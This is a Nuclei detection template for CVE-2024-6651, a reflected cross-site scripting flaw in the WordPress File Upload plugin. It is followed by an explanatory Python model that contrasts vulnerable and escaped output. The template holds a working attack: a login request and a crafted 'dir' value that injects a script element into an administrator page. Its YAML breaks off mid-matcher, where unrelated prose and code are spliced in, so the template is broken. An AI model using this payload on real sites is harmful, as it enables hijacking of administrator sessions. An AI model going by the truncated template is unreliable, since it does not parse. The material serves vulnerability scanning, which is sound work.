id: CVE-2024-6651

info:
  name: WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    The WordPress File Upload plugin before version 4.24.8 contains a reflected cross-site scripting vulnerability. The plugin does not sanitize or escape the 'dir' parameter of the file browser page (options-general.php?page=wordpress_file_upload&action=file_browser) before echoing it back into the response, so an attacker who gets an administrator to open a crafted link can execute arbitrary JavaScript in that administrator's browser context. The template logs in with the supplied credentials only to reach the admin-side page; the injection itself is unauthenticated, which is why the CVSS vector carries PR:N with UI:R.
  reference:
    - https://wpscan.com/vulnerability/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6651
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2024-6651
    cwe-id: CWE-79
  metadata:
    max-request: 3
    vendor: WordPress
    product: wp-file-upload
    fofa-query: body='wp-content/plugins/wp-file-upload/'
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the plugin from the front page before spending the login round-trip.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'wp-file-upload/'
        internal: true

  # Request 2: authenticate, then request the file browser page with a 'dir' value that closes
  # the surrounding attribute and tag, injects a script element, and opens a dummy tag so the
  # trailing quote of the original attribute is swallowed instead of appearing as stray text.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser&dir=7b2BEyT8ArR1jaD9%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctest%20test%3D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '">
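The payload in the second request only works because the 'dir' value lands inside an HTML attribute without attribute-context escaping. The following Python is an added, offline model of that mechanism; it is not code from the template, from the plugin, or from WordPress. `render_vulnerable` and `render_hardened` are hypothetical stand-ins for the plugin's output (the real markup is not on this page), with `html.escape(quote=True)` playing the role that `esc_attr()` plays in WordPress, and `is_reflected_unescaped` mirrors the template's body matcher, which looks for the breakout sequence reflected verbatim.

```python
from html import escape
from urllib.parse import parse_qs, urlparse

# The exact probe URL from the template's second request; the dir value is percent-encoded.
PROBE_URL = (
    "/wp-admin/options-general.php?page=wordpress_file_upload&action=file_browser"
    "&dir=7b2BEyT8ArR1jaD9%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctest%20test%3D"
)

# The breakout sequence the template expects to see reflected without escaping.
INJECTED_SCRIPT = '"><script>alert(document.domain)</script>'


def dir_param(url: str) -> str:
    """Percent-decode the 'dir' query parameter the way PHP's $_GET would present it."""
    return parse_qs(urlparse(url).query)["dir"][0]


def render_vulnerable(dir_value: str) -> str:
    """Hypothetical model of the pre-4.24.8 behaviour: 'dir' is echoed into an attribute as-is."""
    return f'<input type="hidden" name="dir" value="{dir_value}">'


def render_hardened(dir_value: str) -> str:
    """Same markup with attribute-context escaping (what esc_attr() does in WordPress)."""
    return f'<input type="hidden" name="dir" value="{escape(dir_value, quote=True)}">'


def is_reflected_unescaped(body: str) -> bool:
    """Offline equivalent of the template's matcher: the breakout appears verbatim in the body."""
    return INJECTED_SCRIPT in body


if __name__ == "__main__":
    value = dir_param(PROBE_URL)
    for label, body in (("vulnerable", render_vulnerable(value)), ("hardened", render_hardened(value))):
        print(f"{label}: reflected={is_reflected_unescaped(body)}\n  {body}")
```

In the vulnerable rendering the decoded value `7b2BEyT8ArR1jaD9"><script>alert(document.domain)</script><test test=` closes the `value` attribute and the `<input>` tag, and the trailing `<test test=` absorbs the template's original `">` into a harmless dummy attribute, which is why the script element parses cleanly. With attribute escaping the quotes and angle brackets become entities and the same matcher no longer fires; when triaging a real scan result, confirm the match is inside the admin page body rather than a redirect or login form before reporting it.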